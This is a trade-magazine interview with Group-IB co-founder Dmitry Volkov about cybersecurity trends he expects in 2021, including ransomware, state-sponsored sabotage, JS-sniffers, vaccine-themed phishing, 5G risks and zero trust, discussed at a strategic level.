As a first-year student at Russia’s leading engineering university, the Moscow State Technical University of N.E. Bauman, Dmitry Volkov co-founded Group-IB, a cyber investigations startup back then. Seventeen years on, the company has evolved into one of the cybersecurity leaders known for its engineering innovations. Group-IB now protects banks, industrial enterprises, and eCommerce giants in 60 countries around the world, and offers solutions in Threat and Fraud Hunting, Threat Intelligence & Attribution, and Digital Risk Protection categories. The company’s services, however, continue to play an important role in feeding the Group-IB Threat Hunting ecosystem, distributed across Singapore, Amsterdam, Hanoi, Moscow, Bahrain, and other locations, with unique battlefield cyberthreat intel.
Volkov is the mastermind behind most of Group-IB’s products. From day one, he has been a prominent voice leading Group-IB toward becoming the go-to expert in threat hunting and intelligence. His team successfully conducted the first and later on the most complicated cyber investigations and DFIR engagements. They have helped identify and track the most notorious threat actors, including Cobalt, Silence, MoneyTaker, Lazarus, etc.
Volkov is a recognized visionary leader. In 2015, he was listed by Business Insider as one of the top 7 professionals behind influential security companies. Dmitry is a great believer in the idea of engineering neutrality and advocate of cyber weapon non-proliferation. In 2013, Volkov became a member of the UN Open-ended Intergovernmental Expert Group aimed at conducting a comprehensive study on the problem of global cybercrime. Since 2016 he is a member of the Europol EC3 Advisory Group on Internet Security.
In a recent interview with Augustin Kurian from CISO MAG, Volkov talks about cybersecurity trends in 2021, espionage attacks, and how various scammers are discussing these topics like vaccines on the dark web.
What according to you will continue to be a cybersecurity trend even in 2021?
I’m sure that next year we will see even more ransomware operators joining Big Game Hunting, which refers to the attacks on big companies with huge assets that are more likely to pay the ransom. With large companies continuing to make some primitive errors, like failure to promptly update the software to patch vulnerabilities or the use of weak passwords, they are still an easy target for ransomware operators. The above also explains the continuous growth of the market for the sale of access to corporate networks, which, according to Group-IB forecasts, will continue increasing the following year.
Next year, in the light of rising tensions in MEA, Group-IB expects to see more sabotage campaigns by state-sponsored threat actors in the region. This might lead to dire consequences since intelligence agencies are attacking more aggressively. Their goal is now not only to spy on targets covertly but also to destroy critical infrastructure facilities.
The year 2021 is also likely to bring more attacks with the use of JS-sniffers and POS malware, intending to gather bank card data (text data and data of bank card magnetic strips) that pose a major threat to online retail, especially in the U.S. JS-sniffers, which once were a seldom-studied type of malware, has become a mainstream tool for cybercriminals who make their living selling stolen textual data from bank cards. Only from H2 2019 to H1 2020, the number of known JS-sniffer families has grown from 38 to 96, while the techniques that prevent JS-sniffers from being detected on web resources have improved greatly.
It is safe to say that the COVID-19 vaccine may take a fair share of the limelight in 2021. Do you think there would be an uptick in the number of phishing and ransomware attacks surrounding the same?
Threat actors always exploit hot topics in their attacks and the vaccine will be no exception. Therefore, we are likely to see a lot of phishing emails and scams surrounding this subject. Already, we see various scammers discussing these topics on the dark web, though, not very actively.
This year, several countries, including the U.S., admitted they were being targeted by state-sponsored espionage attacks surrounding vaccine development. With the varying success rate of different vaccines across the world, do you anticipate a surge in corporate espionage in 2021?
Espionage is always on the rise: new groups appear every year and old groups whose activities remained undetected are uncovered; tools and instruments to carry out the attacks are constantly being improved, and we see that state-sponsored attackers are only getting stronger. In the future, state-sponsored threat actors are likely to engage ordinary cybercriminals purchasing access to corporate networks from them or recruiting them for espionage activities, which will lead to an even greater increase in spying. As I’ve already mentioned, the battle for the vaccine market has already begun, and we expect espionage around vaccine-related organizations to grow further.
In your recent report on cybercrime, Group-IB stated that it identified a continuing trend where physical destruction of infrastructure is replacing espionage. It also highlighted that seven new APT groups joined the global intelligence service stand-off. Can you share more details about it? And how big of a concern is it?
It would be correct to say that the attackers’ focus has shifted from only espionage to spying with subsequent sabotage, or physical destruction of infrastructure. To sabotage effectively, one must first gain access to a target network, do reconnaissance in the victim network, and obtain desirable resources. Only advanced nation-state attackers can carry out effective sabotage operations, with such campaigns being prepared for years. Since the results of sabotage campaigns become visible immediately, attackers normally reveal themselves as a last resort and only in hot spots. It’s not worth explaining that such attacks can lead to colossal losses. Sabotage campaigns that we see today should be regarded as only a rehearsal, and judging from it, critical infrastructure facilities are not ready for a situation where such attacks become a general problem, given the constant growth of the number of state-sponsored Advanced Persistent Threat (APT) groups. It is noteworthy that sometimes cybersecurity researchers notice new APT groups only several years after it began their activity, which underlines how sophisticated these threat actors are.
By 2021, 5G will be widely available, and the floodgates will open, and both the white hats and black hats of the world will experience a swift learning curve in navigating the mass distribution and interconnectivity of 5G. What strategies should companies deploy to circumvent this impending threat landscape?
The architectural features of 5G (compared to 1/2/3/4G), such as superfast data transfers and other advantages of the new technology, are mainly implemented using software rather than hardware platforms. It means that all threats to server and software solutions are becoming relevant to 5G network operators. Such threats, including traffic manipulation and DDoS attacks, might become much more frequent and effective due to the large number of insecure devices connected and wide bandwidth. I would, therefore, highlight three main points regarding the issue by the priority. The first one is research: it is necessary to invest as much as possible in 5G security research. The second one is the inventory. Connected devices are very often vulnerable, and it is necessary to create a system to identify all new devices and monitor their status. Currently, existing solutions do not solve this problem well. The third one is protection. I would keep this issue open because this is a necessary phase, but it is unique for each organization.
From the standpoint of a zero-trust model, do you think it should be standard and by-design for the future?
This model can and must become the standard. We see more and more companies in the corporate sector building their cybersecurity in accordance with the zero-trust model, which confirms its viability.
About the Author
Augustin Kurian is part of the editorial team at CISO MAG and writes interviews and features.
This interview first appeared in the January 2021 issue of CISO MAG. Get your preview here.